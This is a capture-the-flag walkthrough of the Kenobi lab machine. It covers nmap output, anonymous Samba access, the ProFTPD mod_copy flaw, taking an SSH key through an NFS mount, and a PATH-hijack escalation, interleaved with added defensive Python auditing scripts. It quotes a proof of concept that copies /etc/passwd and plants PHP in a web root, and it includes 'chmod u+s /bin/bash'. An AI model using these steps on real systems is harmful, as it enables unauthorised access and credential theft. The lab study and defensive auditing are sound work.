Now we run a reconnaissance scan with nmap to find which ports are open on the host.
-sS: tells Nmap to perform a SYN scan, also known as a "stealth" scan.
-Pn: tells Nmap to skip host discovery and scan anyway.
-n: tells Nmap not to do DNS name resolution, which speeds up the scan.
--open: shows only the ports that are open.
-vvv: enables Nmap's detailed, verbose output.
--min-rate 500: sets the minimum packet send rate to 500 per second, which speeds up the scan.
# Nmap 7.93 scan initiated Sat Jul 29 23:02:18 2023 as: nmap -sCV -p21,22,80,111,139,445,2049 -oN taget.txt 10.10.102.103
Nmap scan report for 10.10.102.103
Host is up (0.063s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3ad834149e95d168d3b0f057be2c0ae (RSA)
|   256 f8277d642997e6f865546522f7c81d8a (ECDSA)
|_  256 5a06edebb6567e4c01ddeabcbafa3379 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      36369/tcp   mountd
|   100005  1,2,3      40681/udp   mountd
|   100005  1,2,3      43842/udp6  mountd
|   100005  1,2,3      52273/tcp6  mountd
|   100021  1,3,4      42561/tcp   nlockmgr
|   100021  1,3,4      42643/udp   nlockmgr
|   100021  1,3,4      44191/tcp6  nlockmgr
|   100021  1,3,4      56149/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m12s, deviation: 2h53m12s, median: 12s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2023-07-29T16:02:43-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-07-29T21:02:43
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 29 23:02:33 2023 -- 1 IP address (1 host up) scanned in 15.35 seconds
Now we launch another nmap run to see which services and versions are running on the ports we found open.
In the Nmap scan we see that port 111 is open, running the rpcbind service: a server that maps remote procedure call program numbers to universal addresses.
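As an added example (not part of the original writeup), here is a small Python triage of the nmap -oN report above: it parses the port table and the smb-security-mode block and turns them into the findings a defender would act on. The sample input is a trimmed copy of the page's own scan output; the remediation hints in the strings are mine.

```python
import re

# Sample input: lines taken from the nmap -oN report above (this page's own
# scan of 10.10.102.103), trimmed to the port table and the SMB security block.
SAMPLE_SCAN = """\
# Nmap 7.93 scan initiated Sat Jul 29 23:02:18 2023 as: nmap -sCV -p21,22,80,111,139,445,2049 -oN taget.txt 10.10.102.103
Nmap scan report for 10.10.102.103
Host is up (0.063s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
"""

# "PORT/PROTO STATE SERVICE VERSION..." rows of the port table
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "|   key: value" rows of an NSE script block (keys without hyphens only)
SCRIPT_RE = re.compile(r"^\|[_ ]\s*([a-z_]+):\s*(.+)$")


def parse_ports(text):
    """Return one dict per port line of an nmap -oN report."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
    return ports


def parse_smb_security(text):
    """Collect key: value pairs from the smb-security-mode script block."""
    flags = {}
    for line in text.splitlines():
        m = SCRIPT_RE.match(line)
        if m:
            flags[m.group(1)] = m.group(2).strip()
    return flags


def triage(text):
    """Turn the raw report into a list of defender-facing findings."""
    findings = []
    open_services = {p["service"]: p for p in parse_ports(text)
                     if p["state"] == "open"}
    ftp = open_services.get("ftp")
    if ftp and ftp["version"].startswith("ProFTPD 1.3.5"):
        findings.append("21/tcp: ProFTPD 1.3.5 exposes mod_copy SITE CPFR/CPTO "
                        "to unauthenticated clients (ProFTPD bug 4169); "
                        "upgrade (patched in 1.3.5a) or disable mod_copy")
    if any(s in open_services for s in ("nfs", "nfs_acl", "mountd")):
        findings.append("2049/tcp: NFS is exported; review /etc/exports for "
                        "paths any host may mount")
    if "rpcbind" in open_services:
        findings.append("111/tcp: rpcbind exposed; any client can enumerate "
                        "RPC services such as nfs and mountd")
    smb = parse_smb_security(text)
    if smb.get("account_used") == "guest":
        findings.append("445/tcp: SMB accepted a guest session; anonymous "
                        "share listing is possible")
    if smb.get("message_signing", "").startswith("disabled"):
        findings.append("445/tcp: SMB message signing disabled; set "
                        "'server signing = mandatory' in smb.conf")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_SCAN):
        print("-", finding)
```

The same two regexes work on the full report above; the SMB findings are the ones the scan already hints at (account_used: guest, message signing disabled), and the ProFTPD and NFS lines are what the rest of this writeup goes on to use.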
Samba
We will try to check the Samba shares with an anonymous login, using the smbclient tool.
We see that we get in and that there is a file, which we download locally to see what it tells us.
log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): 
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|       ..        |
|      . o. .     |
|     ..=o +.     |
|    . So.o++o.   |
|   o ...+oo.Bo*o |
|  o o ..o.o+.@oo |
| . . . E .O+= .  |
|  . . oBo.       |
+----[SHA256]-----+

# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName			"ProFTPD Default Installation"
ServerType			standalone
DefaultServer			on

# Port 21 is the standard FTP port.
Port				21

# Don't use IPv6 support by default.
UseIPv6				off

# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask				022

# To prevent DoS attacks, set the maximum number of child processes
# to 30.  If you need to allow more than 30 concurrent connections
# at once, simply increase this value.  Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances			30

# Set the user and group under which the server will run.
User				kenobi
Group				kenobi

# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~

# Normally, we want files to be overwriteable.
AllowOverwrite		on

# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
  DenyAll
</Limit>

# A basic anonymous configuration, no upload directories.  If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
  User				ftp
  Group				ftp

  # We want clients to be able to login with "anonymous" as well as "ftp"
  UserAlias			anonymous ftp

  # Limit the maximum number of anonymous logins
  MaxClients			10

  # We want 'welcome.msg' displayed at login, and '.message' displayed
  # in each newly chdired directory.
  DisplayLogin			welcome.msg
  DisplayChdir			.message

  # Limit WRITE everywhere in the anonymous chroot
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>

#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

# server string is the equivalent of the NT Description field
   server string = %h server (Samba, Ubuntu)

# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
#   wins support = no

# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
;   wins server = w.x.y.z

# This will prevent nmbd to search for NetBIOS names through DNS.
   dns proxy = no

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes

#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
#   syslog only = no

# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
   syslog = 0

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d

####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.  
   passdb backend = tdbsam

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap uid = 10000-20000
;   idmap gid = 10000-20000
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 (default) means that usershare is disabled.
;   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

# Un-comment the following (and tweak the other settings below to suit)
# to enable the default home directory shares. This will share each
# user's home directory as \\server\username
;[homes]
;   comment = Home Directories
;   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
;   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
;   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
;   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# Un-comment the following parameter to make sure that only "username"
# can connect to \\server\username
# This might need tweaking when using external authentication schemes
;   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no

# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin

[anonymous]
   path = /home/kenobi/share
   browseable = yes
   read only = yes
   guest ok = yes
We can see that it is an SSH key (generated for the kenobi user).
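The smb.conf recovered from log.txt is also the explanation for why the anonymous smbclient login worked: the [anonymous] share has guest ok = yes, and [global] maps failed logins to the guest account. As an added example (not part of the original writeup), the following Python audits an smb.conf for exactly those settings. The sample input is the share-relevant part of the page's own smb.conf, kept with its ';' and '#' comment lines so the parser has to skip them.

```python
# Sample input: the share-relevant lines of the smb.conf found in log.txt
# above (the page's own data), including commented-out sample shares.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server role = standalone server
   map to guest = bad user
   usershare allow guests = yes

;[homes]
;   comment = Home Directories
;   browseable = no
;   read only = yes

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes

[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no

[anonymous]
   path = /home/kenobi/share
   browseable = yes
   read only = yes
   guest ok = yes
"""


def parse_smb_conf(text):
    """Parse smb.conf into {section: {option: value}}.

    Both ';' and '#' start comment lines; option names are case-insensitive.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def is_yes(value):
    return str(value).strip().lower() in ("yes", "true", "1")


def guest_shares(sections):
    """Shares reachable without credentials, and whether they are writable."""
    out = []
    for name, opts in sections.items():
        if name == "global":
            continue
        # 'public' is a synonym of 'guest ok'; both default to no
        guest = is_yes(opts.get("guest ok", opts.get("public", "no")))
        if not guest:
            continue
        # 'read only' defaults to yes; 'writable'/'writeable' override it
        writable = (is_yes(opts.get("writable", opts.get("writeable", "no")))
                    or not is_yes(opts.get("read only", "yes")))
        out.append({"share": name, "path": opts.get("path"),
                    "writable": writable})
    return out


def global_guest_settings(sections):
    """Global options that widen anonymous access (defaults: never / no)."""
    g = sections.get("global", {})
    notes = []
    if g.get("map to guest", "never").lower() != "never":
        notes.append("map to guest = %s: failed logins become guest sessions"
                     % g["map to guest"])
    if is_yes(g.get("usershare allow guests", "no")):
        notes.append("usershare allow guests = yes: users may publish "
                     "guest-accessible shares with 'net usershare'")
    return notes


if __name__ == "__main__":
    conf = parse_smb_conf(SAMPLE_SMB_CONF)
    for note in global_guest_settings(conf):
        print("global:", note)
    for share in guest_shares(conf):
        print("guest share:", share)
```

Run against the real file (`parse_smb_conf(open("/etc/samba/smb.conf").read())`) it reports the [anonymous] share as guest-readable; the fix on the server side is `guest ok = no` on the share (or `map to guest = never`) and, as the comment block in the file itself says, `testparm` afterwards to confirm the result.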
FTP exploitation
Let's look at the exploits that can be used: the FILE COPY one.
Description	TJ Saunders 2015-04-07 16:35:03 UTC
Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:

---------------------------------
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
214-CPFR <sp> pathname
214-CPTO <sp> pathname
214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path
214-SYMLINK <sp> source <sp> destination
214-RMDIR <sp> path
214-MKDIR <sp> path
214-The following SITE extensions are recognized:
214-RATIO -- show all ratios in effect
214-QUOTA
214-HELP
214-CHGRP
214-CHMOD
214 Direct comments to root@www01a
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /tmp/passwd.copy
250 Copy successful
-----------------------------------------

He provides another, scarier example:

------------------------------
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto <?php phpinfo(); ?>
550 cpto: Permission denied
site cpfr /proc/self/fd/3
350 File or directory exists, ready for destination name
site cpto /var/www/test.php

test.php now contains
----------------------
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php phpinfo(); ?>' for copying: Permission denied
-----------------------

test.php contains contain correct php script "<?php phpinfo(); ?>" which
can be run by the php interpreter

Source: http://bugs.proftpd.org/show_bug.cgi?id=4169
Here we have the exploit's PoC; we will adapt it to our needs.
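From the defender's side, the bug report above also shows what mod_copy abuse looks like in proftpd.log: the destination name of a failed SITE CPTO ends up in an "error opening destination file ... for copying" line. As an added example (not part of the original writeup or the bug report), the following Python parses log lines in that format and flags copy attempts whose destination carries a PHP tag or points under a web root. The first three sample lines are the ones quoted in the bug report; the other two are constructed here in the same format.

```python
import re

# Sample input: the three proftpd log lines quoted in the bug report above,
# plus two lines constructed here in the same format (a second copy attempt
# aimed at a web root, and a session-close line) to exercise the rules.
SAMPLE_LOG = """\
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php phpinfo(); ?>' for copying: Permission denied
2015-04-04 02:01:40,000 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error opening destination file '/var/www/test.php' for copying: Permission denied
2015-04-04 02:02:00,000 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): FTP session closed.
"""

# "<date> <time> <host> proftpd[<pid>] <host> (<client>): <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \S+ proftpd\[(?P<pid>\d+)\] \S+ "
    r"\((?P<client>[^)]*)\): (?P<msg>.*)$")
# mod_copy's message for a SITE CPTO that could not open its target
COPY_RE = re.compile(r"destination file '(?P<dest>.*)' for copying")
# Directories where a dropped file becomes reachable through the web server
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")


def parse_line(line):
    """Split one proftpd.log line into its fields, or None if it doesn't fit."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ip = re.search(r"\[([\d.]+)\]", ev["client"])
    ev["ip"] = ip.group(1) if ip else ev["client"]
    return ev


def copy_alerts(text):
    """Flag mod_copy activity visible in proftpd.log, with the reasons."""
    alerts = []
    for line in text.splitlines():
        ev = parse_line(line)
        if not ev:
            continue
        m = COPY_RE.search(ev["msg"])
        if not m:
            continue
        dest = m.group("dest")
        reasons = ["SITE CPTO attempt (mod_copy)"]
        if "<?" in dest:
            reasons.append("PHP tag in destination name")
        if dest.startswith(WEB_ROOTS) or dest.endswith((".php", ".phtml")):
            reasons.append("destination under a web root or with a script "
                           "extension")
        alerts.append({"ts": ev["ts"], "pid": int(ev["pid"]), "ip": ev["ip"],
                       "dest": dest, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in copy_alerts(SAMPLE_LOG):
        print(a["ts"], a["ip"], a["dest"], "|", "; ".join(a["reasons"]))
```

The caveat a defender should keep in mind: this line only appears because the copy failed. The successful `site cpto /var/www/test.php` from the report produces no error at this log level, so to see the successful case you need ProFTPD's ExtendedLog with a LogFormat that records the command itself, or you remove the exposure at the source by upgrading past 1.3.5 or disabling mod_copy.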
NC
We will use SITE CPFR and SITE CPTO to copy files/directories from one place to another on the server.
We have to keep in mind what the log.txt file told us: the FTP service is running as the kenobi user, and the SSH key is generated for that user.
We also know that we have access to the /var directory, which we can mount on our system. Kenobi's private key can be copied to the /var/tmp directory.
Mount
So we mount the /var share on a directory we create, /mnt/KenobiNFS/.
sudo mount 10.10.102.103:/var /mnt/KenobiNFS/
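The reason that mount command works at all is the server's /etc/exports. As an added example (not part of the original writeup), the following Python parses an exports file and reports the entries that make a path mountable by any host or that hand client root uid 0 on the export. The sample exports file is constructed here; the box's real exports file is not shown on this page.

```python
import re

# Constructed sample /etc/exports (not from the page). The first line models
# an export that any host may mount, the situation behind the mount above.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/var *(rw,sync,insecure,no_subtree_check,no_root_squash)
/srv/share 10.10.0.0/16(ro,sync,no_subtree_check)
/home/backup 10.10.102.5(rw,sync,root_squash,no_subtree_check) 10.10.102.6(ro)
"""

# one "client(opt,opt)" token; the client part or the option list may be empty
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return [(path, [(client, {options})])] for each non-comment line."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], []
        for tok in parts[1:]:
            m = CLIENT_RE.match(tok)
            # an option list with no client applies to every host
            client, opts = m.group(1) or "*", m.group(2) or ""
            clients.append((client, {o for o in opts.split(",") if o}))
        exports.append((path, clients))
    return exports


def is_world(client):
    """True when the client spec matches any host."""
    return client in ("*", "0.0.0.0/0")


def audit_exports(text):
    """Findings per (path, client) pair; empty when nothing is worrying."""
    findings = []
    for path, clients in parse_exports(text):
        for client, opts in clients:
            reasons = []
            if is_world(client):
                reasons.append("mountable by any host")
            if "no_root_squash" in opts:
                reasons.append("no_root_squash: client root keeps uid 0 "
                               "on the export")
            if "rw" in opts and is_world(client):
                reasons.append("world-writable export")
            if "insecure" in opts:
                reasons.append("insecure: requests from unprivileged source "
                               "ports are accepted")
            if reasons:
                findings.append({"path": path, "client": client,
                                 "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f["path"], f["client"], "->", "; ".join(f["reasons"]))
```

The corrected form of the first line is the third one: a specific client list, `ro` unless writes are needed, and the default `root_squash` left in place. `showmount -e <server>` from another host is the quick way to confirm what is actually being offered after an edit.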
id_rsa
Now that we have the network mount on our machine, we can retrieve the private key, which can be used to log in via SSH.
We copy it to our local machine and change its permissions so that we can use it to log in over SSH.
ssh
As we can see, we can connect using the id_rsa key and we get the first flag, user.txt; now we go for the second one, root.txt.
If we try to enter the /root directory we can't: we don't have sufficient permissions, so we have to escalate privileges.
Privilege escalation: PATH
We have something interesting: /usr/bin/menu
Running the binary gives us 3 options. The 3 options are not very interesting, but with the strings command we can look for readable strings.
Using the strings command we can see that curl and ifconfig show up; if their path is relative rather than absolute, we can hijack the PATH.
By following the process below we can obtain administrator privileges.
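As an added example (not part of the original writeup), here is the same check done as an audit rather than by eye: a minimal strings extractor in Python, a filter for commands invoked by bare name, and a PATH resolver that shows which directory would be searched first for each of them. The binary bytes are constructed here, modelled on the curl/ifconfig strings the writeup found; they are not the menu binary. The hijack_dir field is the finding a defender wants: a command that a setuid program runs through PATH lookup, with a world-writable directory ahead of the real one.

```python
import os
import string

# Constructed sample: printable strings modelled on what `strings /usr/bin/menu`
# showed (curl and ifconfig called by bare name). Made up here, not the real binary.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 +
                 b"curl -I localhost\x00uname -r\x00ifconfig\x00"
                 b"/usr/bin/id\x00Invalid choice\x00Enter your choice :\x00")

# Utilities a privileged helper commonly shells out to; used only to cut
# false positives from ordinary text strings.
COMMON_TOOLS = {"curl", "wget", "ifconfig", "ip", "uname", "id", "cat", "ls",
                "ps", "netstat", "whoami", "python", "sh", "bash"}
# Directories every local user can write to.
WORLD_WRITABLE = ("/dev/shm", "/tmp", "/var/tmp")


def extract_strings(data, min_len=4):
    """Minimal `strings`: runs of at least min_len printable ASCII bytes."""
    printable = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    out, run = [], bytearray()
    for b in data + b"\x00":          # trailing NUL flushes the last run
        if b in printable:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    return out


def relative_commands(strs):
    """Strings that look like a known tool run by bare name (PATH lookup)."""
    hits = []
    for s in strs:
        words = s.split()
        if not words or words[0].startswith("/"):
            continue                  # absolute path: not subject to PATH
        if words[0] in COMMON_TOOLS:
            hits.append((words[0], s))
    return hits


def lookup_order(cmd, path_env):
    """Where execvp()/system() would look for cmd, in search order."""
    return [os.path.join(d, cmd) for d in path_env.split(":") if d]


def path_risk(path_env, live=False):
    """PATH entries any local user can write to.

    Static rule: empty or '.' entries (current directory) and the
    world-writable directories above. With live=True, also os.access(W_OK).
    """
    risky = []
    for d in path_env.split(":"):
        if d in ("", ".") or d.startswith(WORLD_WRITABLE):
            risky.append(d or ".")
        elif live and os.access(d, os.W_OK):
            risky.append(d)
    return risky


def audit(data, path_env):
    """One report entry per bare-name command, with the first writable
    directory that would win the PATH search (None when there is none)."""
    risky = set(path_risk(path_env))
    report = []
    for cmd, s in relative_commands(extract_strings(data)):
        order = lookup_order(cmd, path_env)
        first = next((p for p in order if os.path.dirname(p) in risky), None)
        report.append({"command": cmd, "string": s, "search": order,
                       "hijack_dir": os.path.dirname(first) if first else None})
    return report


if __name__ == "__main__":
    for r in audit(SAMPLE_BINARY, "/dev/shm:/usr/local/bin:/usr/bin:/bin"):
        print(r["command"], "->", r["hijack_dir"] or "ok")
```

The fix on the binary side is the one the output points at: call `/usr/bin/curl` and `/sbin/ifconfig` by absolute path (or reset PATH to a fixed value before `system()`); with the second PATH in the test, which has no writable entry, the report comes back clean for the same binary.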
chmod u+s /bin/bash
Step one: from /dev/shm, listing my PATH with the echo $PATH command shows that my PATH starts with /usr/local, etc.
